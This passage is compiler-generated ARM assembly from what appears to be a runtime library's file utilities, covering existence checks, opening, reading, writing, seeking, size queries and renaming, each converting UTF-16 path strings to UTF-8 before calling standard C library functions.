.L201: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #164 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-164] str r9, [fp, #-160] b .L194 .L212: nop .L194: sub r3, fp, #148 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-228] adc r3, r3, #0 str r3, [fp, #-224] sub r3, fp, #228 ldmia r3, {r2-r3} str r2, [fp, #-148] str r3, [fp, #-144] .L192: sub r1, fp, #172 ldmia r1, {r0-r1} sub r3, fp, #148 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L204 sub r3, fp, #156 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-192] str r3, [fp, #-180] str r4, [fp, #-132] str r5, [fp, #-128] ldr r3, [fp, #-132] mov r1, r3 ldr r0, [fp, #-180] bl realloc str r0, [fp, #-176] ldr r3, [fp, #-176] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L205 ldr r3, .L213+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L213+8 bl fwrite mov r0, #1 bl exit .L205: ldr r3, [fp, #-176] str r3, [fp, #-192] ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-192] str r3, [fp, #-200] sub r3, fp, #124 mov r1, r3 ldr r0, [fp, #-200] bl stat mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-204] ldr r0, [fp, #-200] bl free ldrb r3, [fp, #-204] @ zero_extendqisi2 cmp r3, #0 beq .L208 ldr r3, [fp, #-108] and r3, r3, #16384 cmp r3, #0 bne .L208 mov r3, #1 b .L209 .L208: mov r3, #0 .L209: strb r3, [fp, #-204] ldrb r3, [fp, #-204] and r3, r3, #1 strb r3, [fp, #-204] ldrb r3, [fp, #-204] @ zero_extendqisi2 ldr r2, .L213 ldr r1, [r2] ldr r2, [fp, #-32] eors r1, r2, r1 mov r2, #0 beq .L211 bl __stack_chk_fail .L211: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L214: .align 2 .L213: .word .LC4 .word stderr .word .LC0 .size shar__file__is__exist, .-shar__file__is__exist .section .rodata .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global shar__directory__is__exist .syntax unified .arm .fpu softvfp .type shar__directory__is__exist, %function shar__directory__is__exist: @ args = 0, pretend = 0, frame = 200 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #200 str r0, [fp, #-212] str r1, [fp, #-208] str r2, [fp, #-216] ldr r3, .L237 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #212 ldmia r3, {r2-r3} str r2, [fp, #-172] str r3, [fp, #-168] ldr r3, [fp, #-216] str r3, [fp, #-196] mov r3, #0 str r3, [fp, #-192] mov r2, #0 mov r3, #0 str r2, [fp, #-164] str r3, [fp, #-160] mov r2, #0 mov r3, #0 str r2, [fp, #-156] str r3, [fp, #-152] mov r2, #0 mov r3, #0 str r2, [fp, #-148] str r3, [fp, #-144] b .L216 .L228: ldr r3, [fp, #-148] lsl r3, r3, #1 ldr r2, [fp, #-196] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-202] @ movhi mov r3, #0 strb r3, [fp, #-203] ldrh r3, [fp, #-202] cmp r3, #0 beq .L236 ldrh r3, [fp, #-202] cmp r3, #127 bhi .L219 mov r3, #1 strb r3, [fp, #-203] b .L220 .L219: ldrh r3, [fp, #-202] cmp r3, #2048 bcs .L221 mov r3, #2 strb r3, [fp, #-203] b .L220 .L221: mov r3, #3 strb r3, [fp, #-203] .L220: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #156 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-156] str r7, [fp, #-152] ldr r3, [fp, #-192] str r3, [fp, #-188] sub r3, fp, #156 ldmia r3, {r2-r3} str r2, [fp, #-140] str r3, [fp, #-136] ldr r3, [fp, #-140] mov r1, r3 ldr r0, [fp, #-188] bl realloc str r0, [fp, #-184] ldr r3, [fp, #-184] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L222 ldr r3, .L237+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L237+8 bl fwrite mov r0, #1 bl exit .L222: ldr r3, [fp, #-184] str r3, [fp, #-192] ldrb r3, [fp, #-203] @ zero_extendqisi2 cmp r3, #3 beq .L224 cmp r3, #3 bgt .L225 cmp r3, #1 beq .L226 cmp r3, #2 beq .L227 b .L225 .L226: ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 ldrh r2, [fp, #-202] @ movhi and r2, r2, #255 strb r2, [r3] b .L225 .L227: ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L225 .L224: ldrh r3, [fp, #-202] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #2 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L225: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #164 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-164] str r9, [fp, #-160] b .L218 .L236: nop .L218: sub r3, fp, #148 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-228] adc r3, r3, #0 str r3, [fp, #-224] sub r3, fp, #228 ldmia r3, {r2-r3} str r2, [fp, #-148] str r3, [fp, #-144] .L216: sub r1, fp, #172 ldmia r1, {r0-r1} sub r3, fp, #148 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L228 sub r3, fp, #156 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-192] str r3, [fp, #-180] str r4, [fp, #-132] str r5, [fp, #-128] ldr r3, [fp, #-132] mov r1, r3 ldr r0, [fp, #-180] bl realloc str r0, [fp, #-176] ldr r3, [fp, #-176] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L229 ldr r3, .L237+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L237+8 bl fwrite mov r0, #1 bl exit .L229: ldr r3, [fp, #-176] str r3, [fp, #-192] ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-192] str r3, [fp, #-200] sub r3, fp, #124 mov r1, r3 ldr r0, [fp, #-200] bl stat mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-204] ldr r0, [fp, #-200] bl free ldrb r3, [fp, #-204] @ zero_extendqisi2 cmp r3, #0 beq .L232 ldr r3, [fp, #-108] and r3, r3, #16384 cmp r3, #0 beq .L232 mov r3, #1 b .L233 .L232: mov r3, #0 .L233: strb r3, [fp, #-204] ldrb r3, [fp, #-204] and r3, r3, #1 strb r3, [fp, #-204] ldrb r3, [fp, #-204] @ zero_extendqisi2 ldr r2, .L237 ldr r1, [r2] ldr r2, [fp, #-32] eors r1, r2, r1 mov r2, #0 beq .L235 bl __stack_chk_fail .L235: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L238: .align 2 .L237: .word .LC5 .word stderr .word .LC0 .size shar__directory__is__exist, .-shar__directory__is__exist .align 2 .global shar__open__file .syntax unified .arm .fpu softvfp .type shar__open__file, %function shar__open__file: @ args = 4, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #112 str r0, [fp, #-124] str r1, [fp, #-120] str r2, [fp, #-128] str r3, [fp, #-132] sub r3, fp, #124 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-128] str r3, [fp, #-100] mov r3, #0 str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L240 .L252: ldr r3, [fp, #-52] lsl r3, r3, #1 ldr r2, [fp, #-100] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-110] @ movhi mov r3, #0 strb r3, [fp, #-111] ldrh r3, [fp, #-110] cmp r3, #0 beq .L257 ldrh r3, [fp, #-110] cmp r3, #127 bhi .L243 mov r3, #1 strb r3, [fp, #-111] b .L244 .L243: ldrh r3, [fp, #-110] cmp r3, #2048 bcs .L245 mov r3, #2 strb r3, [fp, #-111] b .L244 .L245: mov r3, #3 strb r3, [fp, #-111] .L244: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #60 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-60] str r7, [fp, #-56] ldr r3, [fp, #-96] str r3, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-92] bl realloc str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L246 ldr r3, .L258 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L258+4 bl fwrite mov r0, #1 bl exit .L246: ldr r3, [fp, #-88] str r3, [fp, #-96] ldrb r3, [fp, #-111] @ zero_extendqisi2 cmp r3, #3 beq .L248 cmp r3, #3 bgt .L249 cmp r3, #1 beq .L250 cmp r3, #2 beq .L251 b .L249 .L250: ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 ldrh r2, [fp, #-110] @ movhi and r2, r2, #255 strb r2, [r3] b .L249 .L251: ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L249 .L248: ldrh r3, [fp, #-110] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #2 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L249: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #68 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-68] str r9, [fp, #-64] b .L242 .L257: nop .L242: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-140] adc r3, r3, #0 str r3, [fp, #-136] sub r3, fp, #140 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L240: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L252 sub r3, fp, #60 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-96] str r3, [fp, #-84] str r4, [fp, #-36] str r5, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-84] bl realloc str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L253 ldr r3, .L258 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L258+4 bl fwrite mov r0, #1 bl exit .L253: ldr r3, [fp, #-80] str r3, [fp, #-96] ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-96] str r3, [fp, #-108] sub r3, fp, #132 mov r1, r3 ldr r0, [fp, #-108] bl fopen str r0, [fp, #-104] ldr r0, [fp, #-108] bl free ldr r3, [fp, #4] ldr r2, [fp, #-104] str r2, [r3] ldr r3, [fp, #-104] cmp r3, #0 movne r3, #1 moveq r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L259: .align 2 .L258: .word stderr .word .LC0 .size shar__open__file, .-shar__open__file .align 2 .global shar__flush__file .syntax unified .arm .fpu softvfp .type shar__flush__file, %function shar__flush__file: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r0, [fp, #-8] bl fflush mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__flush__file, .-shar__flush__file .align 2 .global shar__close__file .syntax unified .arm .fpu softvfp .type shar__close__file, %function shar__close__file: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r0, [fp, #-8] bl fclose mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__close__file, .-shar__close__file .align 2 .global shar__read__from__file .syntax unified .arm .fpu softvfp .type shar__read__from__file, %function shar__read__from__file: @ args = 4, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r2, [fp, #-28] str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-16] mov r1, #1 ldr r0, [fp, #4] bl fread mov r3, r0 mov r2, r3 mov r3, #0 str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__read__from__file, .-shar__read__from__file .align 2 .global shar__write__to__file .syntax unified .arm .fpu softvfp .type shar__write__to__file, %function shar__write__to__file: @ args = 4, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r2, [fp, #-28] str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-16] mov r1, #1 ldr r0, [fp, #4] bl fwrite mov r3, r0 mov r2, r3 mov r3, #0 str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__write__to__file, .-shar__write__to__file .section .rodata .align 2 .LC6: .word __stack_chk_guard .text .align 2 .global shar__get__file__size .syntax unified .arm .fpu softvfp .type shar__get__file__size, %function shar__get__file__size: @ args = 0, pretend = 0, frame = 208 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #208 str r0, [fp, #-220] str r1, [fp, #-216] str r2, [fp, #-224] ldr r3, .L292 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #220 ldmia r3, {r2-r3} str r2, [fp, #-172] str r3, [fp, #-168] ldr r3, [fp, #-224] str r3, [fp, #-204] mov r3, #0 str r3, [fp, #-200] mov r2, #0 mov r3, #0 str r2, [fp, #-164] str r3, [fp, #-160] mov r2, #0 mov r3, #0 str r2, [fp, #-156] str r3, [fp, #-152] mov r2, #0 mov r3, #0 str r2, [fp, #-148] str r3, [fp, #-144] b .L269 .L281: ldr r3, [fp, #-148] lsl r3, r3, #1 ldr r2, [fp, #-204] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-210] @ movhi mov r3, #0 strb r3, [fp, #-211] ldrh r3, [fp, #-210] cmp r3, #0 beq .L291 ldrh r3, [fp, #-210] cmp r3, #127 bhi .L272 mov r3, #1 strb r3, [fp, #-211] b .L273 .L272: ldrh r3, [fp, #-210] cmp r3, #2048 bcs .L274 mov r3, #2 strb r3, [fp, #-211] b .L273 .L274: mov r3, #3 strb r3, [fp, #-211] .L273: ldrb r2, [fp, #-211] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #156 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-156] str r7, [fp, #-152] ldr r3, [fp, #-200] str r3, [fp, #-196] sub r3, fp, #156 ldmia r3, {r2-r3} str r2, [fp, #-140] str r3, [fp, #-136] ldr r3, [fp, #-140] mov r1, r3 ldr r0, [fp, #-196] bl realloc str r0, [fp, #-192] ldr r3, [fp, #-192] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L275 ldr r3, .L292+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L292+8 bl fwrite mov r0, #1 bl exit .L275: ldr r3, [fp, #-192] str r3, [fp, #-200] ldrb r3, [fp, #-211] @ zero_extendqisi2 cmp r3, #3 beq .L277 cmp r3, #3 bgt .L278 cmp r3, #1 beq .L279 cmp r3, #2 beq .L280 b .L278 .L279: ldr r3, [fp, #-164] ldr r2, [fp, #-200] add r3, r2, r3 ldrh r2, [fp, #-210] @ movhi and r2, r2, #255 strb r2, [r3] b .L278 .L280: ldrh r3, [fp, #-210] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-200] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-210] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-200] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L278 .L277: ldrh r3, [fp, #-210] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-200] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-210] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-200] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-210] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #2 ldr r1, [fp, #-200] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L278: ldrb r2, [fp, #-211] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #164 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-164] str r9, [fp, #-160] b .L271 .L291: nop .L271: sub r3, fp, #148 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-236] adc r3, r3, #0 str r3, [fp, #-232] sub r3, fp, #236 ldmia r3, {r2-r3} str r2, [fp, #-148] str r3, [fp, #-144] .L269: sub r1, fp, #172 ldmia r1, {r0-r1} sub r3, fp, #148 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L281 sub r3, fp, #156 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-200] str r3, [fp, #-188] str r4, [fp, #-132] str r5, [fp, #-128] ldr r3, [fp, #-132] mov r1, r3 ldr r0, [fp, #-188] bl realloc str r0, [fp, #-184] ldr r3, [fp, #-184] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L282 ldr r3, .L292+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L292+8 bl fwrite mov r0, #1 bl exit .L282: ldr r3, [fp, #-184] str r3, [fp, #-200] ldr r3, [fp, #-164] ldr r2, [fp, #-200] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-200] str r3, [fp, #-208] sub r3, fp, #124 mov r1, r3 ldr r0, [fp, #-208] bl stat mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-212] ldrb r3, [fp, #-212] @ zero_extendqisi2 cmp r3, #0 beq .L285 ldr r3, [fp, #-108] and r3, r3, #16384 cmp r3, #0 bne .L285 mov r3, #1 b .L286 .L285: mov r3, #0 .L286: strb r3, [fp, #-212] ldrb r3, [fp, #-212] and r3, r3, #1 strb r3, [fp, #-212] ldrb r3, [fp, #-212] @ zero_extendqisi2 cmp r3, #0 beq .L287 ldr r3, [fp, #-80] mov r2, r3 asr r3, r2, #31 str r2, [fp, #-180] str r3, [fp, #-176] b .L288 .L287: mvn r2, #0 mvn r3, #0 str r2, [fp, #-180] str r3, [fp, #-176] .L288: ldr r0, [fp, #-208] bl free sub r3, fp, #180 ldmia r3, {r2-r3} ldr r1, .L292 ldr r0, [r1] ldr r1, [fp, #-32] eors r0, r1, r0 mov r1, #0 beq .L290 bl __stack_chk_fail .L290: mov r0, r2 mov r1, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L293: .align 2 .L292: .word .LC6 .word stderr .word .LC0 .size shar__get__file__size, .-shar__get__file__size .align 2 .global shar__get__position__in__file .syntax unified .arm .fpu softvfp .type shar__get__position__in__file, %function shar__get__position__in__file: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r0, [fp, #-8] bl ftell mov r3, r0 mov r2, r3 asr r3, r2, #31 mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__get__position__in__file, .-shar__get__position__in__file .align 2 .global shar__set__position__in__file .syntax unified .arm .fpu softvfp .type shar__set__position__in__file, %function shar__set__position__in__file: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-8] str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-20] mov r2, #0 mov r1, r3 ldr r0, [fp, #-8] bl fseek mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__set__position__in__file, .-shar__set__position__in__file .align 2 .global shar__file__rename .syntax unified .arm .fpu softvfp .type shar__file__rename, %function shar__file__rename: @ args = 12, pretend = 0, frame = 216 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #216 str r0, [fp, #-196] str r1, [fp, #-192] str r2, [fp, #-200] sub r3, fp, #196 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-200] str r3, [fp, #-148] mov r3, #0 str r3, [fp, #-144] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L299 .L311: ldr r3, [fp, #-52] lsl r2, r3, #1 ldr r3, [fp, #-148] add r3, r3, r2 ldrh r3, [r3] @ movhi strh r3, [fp, #-182] @ movhi mov r3, #0 strb r3, [fp, #-185] ldrh r3, [fp, #-182] cmp r3, #0 beq .L332 ldrh r3, [fp, #-182] cmp r3, #127 bhi .L302 mov r3, #1 strb r3, [fp, #-185] b .L303 .L302: ldrh r3, [fp, #-182] cmp r3, #2048 bcs .L304 mov r3, #2 strb r3, [fp, #-185] b .L303 .L304: mov r3, #3 strb r3, [fp, #-185] .L303: ldrb r0, [fp, #-185] @ zero_extendqisi2 mov r1, #0 sub r3, fp, #60 ldmia r3, {r2-r3} adds ip, r2, r0 str ip, [fp, #-220] adc r3, r3, r1 str r3, [fp, #-216] sub r3, fp, #220 ldmia r3, {r2-r3} str r2, [fp, #-60] str r3, [fp, #-56] ldr r3, [fp, #-144] str r3, [fp, #-140] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-140] bl realloc str r0, [fp, #-136] ldr r3, [fp, #-136] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L305 ldr r3, .L334 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L334+4 bl fwrite mov r0, #1 bl exit .L305: ldr r3, [fp, #-136] str r3, [fp, #-144] ldrb r3, [fp, #-185] @ zero_extendqisi2 cmp r3, #3 beq .L307 cmp r3, #3 bgt .L308 cmp r3, #1 beq .L309 cmp r3, #2 beq .L310 b .L308 .L309: ldr r2, [fp, #-68] ldr r3, [fp, #-144] add r2, r3, r2 ldrh r3, [fp, #-182] @ movhi and r3, r3, #255 strb r3, [r2] b .L308 .L310: ldrh r3, [fp, #-182] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r1, r3, #255 ldr r2, [fp, #-68] ldr r3, [fp, #-144] add r2, r3, r2 mvn r3, r1, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-182] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r1, r3, #24 ldr r3, [fp, #-68] add r2, r3, #1 ldr r3, [fp, #-144] add r2, r3, r2 and r3, r1, #255 strb r3, [r2] b .L308 .L307: ldrh r3, [fp, #-182] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r1, r3, #255 ldr r2, [fp, #-68] ldr r3, [fp, #-144] add r2, r3, r2 mvn r3, r1, lsl #27 mvn r3, r3, 